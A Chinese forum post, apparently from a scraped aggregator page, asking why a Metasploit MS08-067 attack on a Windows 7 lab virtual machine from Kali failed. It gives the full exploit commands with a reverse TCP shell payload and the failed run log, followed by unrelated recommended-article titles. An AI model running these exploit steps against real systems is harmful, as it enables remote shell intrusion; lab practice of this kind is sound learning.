该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

靶机:虚拟机win7 x64 专业版 nat网络 IP:192.168.233.128(新安装)

攻击机:虚拟机Kali Linux nat网络 IP:192.168.233.129

靶机与虚拟机双向ping通,nmap检测靶机445端口开放

命令:

use windows/smb/ms08_067_netapi

set PAYLOAD windows/shell/reverse_tcp

set RHOST 192.168.233.128

set LHOST 192.168.233.129

最后检查配置:

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.233.128 yes The target address

RPORT 445 yes The SMB service port (TCP)

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.233.129 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

确认无误,命令:

run

返回:

[*] Started reverse TCP handler on 192.168.233.129:4444

[*] 192.168.233.128:445 - Automatically detecting the target...

[*] 192.168.233.128:445 - Fingerprint: Windows 7 - - lang:Unknown

[*] 192.168.233.128:445 - We could not detect the language pack, defaulting to English

[-] 192.168.233.128:445 - Exploit aborted due to failure: no-target: No matching target

[*] Exploit completed, but no session was created.

然后就没有然后了,这是怎么回事?靶机有问题?

linux ms08 067漏洞,MS08067攻击实验失败的原因是什么?相关推荐

  1. [翻译]现代Linux系统上的栈溢出攻击【转】

    转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...

  2. 谷歌发现利用零日漏洞的攻击、黑客通过漏洞入侵红十字会|2月17日全球网络安全热点

    安全资讯报告 新加坡将加强网络钓鱼诈骗后的安全措施 新加坡正在加强安全措施,以支持当地的银行和通信基础设施,其中包括短信服务提供商需要在发送消息之前检查注册表.预计银行还将开发"更通用&qu ...

  3. Metasploit上使用RPC方式复现一个Linux提权漏洞

    序 学习了几天pwn的栈溢出知识后,收到了期待已久的任务--在metasploit上使用RPC的方式复现一个Linux提权漏洞,学长说这是一个偏向探索性质的,为了督促自己和提高效率,利用这种方式记录下 ...

  4. XSS漏洞自动化攻击工具XSSer

    XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击 ...

  5. linux 鬼精灵漏洞,鬼精灵Grinch:比Bash破壳(shellshock)更严重的Linux漏洞

    安全研究人员在Linux操作系统中发现了一个名为鬼精灵(Grinch)的漏洞,该漏洞存在于linux系统中,和Bash破壳(shellshock)漏洞一样可以在受害者机器上获得最高权限--Root. ...

  6. Alpine Linux:从漏洞发现到代码执行

    本文讲的是Alpine Linux:从漏洞发现到代码执行, 我最近在Alpine Linux的软件包管理器中发现了两个关键的漏洞,分别是CVE-2017-9669和CVE-2017-9671,如果你正 ...

  7. Arch Linux 服务器,Arch Linux不适合当作服务器操作系统的四大原因

    摘要 腾兴网为您分享:Arch Linux不适合当作服务器操作系统的四大原因,云闪付,一路捞,武魂传说,完美志愿等软件知识,以及重复文件清理软件,涂色本,安卓福利社,cc网易cc直播,德化教育管理公共 ...

  8. Snap 程序包管理器被爆Linux 提权漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Canonical 公司旗下产品 Snap 软件封装和部署系统中出现多个漏洞,其中最严重漏洞可被用于提权,获得root权限. Snaps 是自包 ...

  9. 异域linux内核漏洞,Linux内核再现漏洞!这次11年后才发现

    原标题:Linux内核再现漏洞!这次11年后才发现 还记得上一次Linux内核出现大的漏洞是什么时候吗?2009年Linux内核出现严重安全漏洞,直到2014年才被发现,这个严重安全漏洞整整存在了5年 ...

  10. 黑客狂野利用零日漏洞:小米三星也中招,安卓手机最易受此漏洞的攻击?

    零日漏洞的另一个启示,这次是在全球使用最广泛的移动操作系统Android中.黑客无处不在,知名网络安全专家,东方联盟创始人郭盛华还发现了Android 0day漏洞的狂野利用,这是臭名昭著的,因为它向 ...

最新文章

  1. 曝光!十万开发者喜爱的顶级当红讲师
  2. Repository模式(转载)
  3. transform与fit_transform的区别
  4. overlay 如何实现跨主机通信?- 每天5分钟玩转 Docker 容器技术(52)
  5. html5和极速模式,浅谈360浏览器6.0版本极速模式与兼容模式_蓝戒的博客
  6. int转为string类型方法
  7. 零基础学Python的几个经典例子
  8. 如何使用计算机实现fft,快速傅立叶变换(FFT)的计算机实现..doc
  9. 读EasyPR开发详解实践感想1
  10. java动态代理实现与原理详细分析(【转载】By--- Gonjan )
  11. python统计频数_python统计单词出现次数
  12. [STC单片机] STC32G单片机双CAN通信测试
  13. 简单的sql注入之2WP
  14. Machine Learning读书会·北京今日启动(第3期周爱民、张帆)
  15. git pull 时一直卡在Unpacking objects【待解决】
  16. bing每日壁纸客户端
  17. 【搞定Jvm面试】 Java 内存区域揭秘附常见面试题解析
  18. Web前端面试问题集锦
  19. 光纤跳线接口_光纤跳线有哪些接口?
  20. 计算机软考知识点,计算机软考《程序员》常考知识点总结

热门文章

  1. 关于 ADXL362 传感器不工作的说明
  2. 自适应滤波器的设计(终极版)
  3. Matlab之数据归一化函数——mapminmax()
  4. 黑马程序员python入门学习笔记
  5. 系统性能测试实施流程
  6. 学生课堂随机点名系统小结
  7. 惠普1005打印机自检页_HP黑白激光打印机打印自检页的方法
  8. 台式计算机可以连接蓝牙吗,台式电脑可以连接蓝牙音响吗
  9. 游戏引擎架构 (Jason Gregory 著)
  10. vue运用JsBarcode生成一维码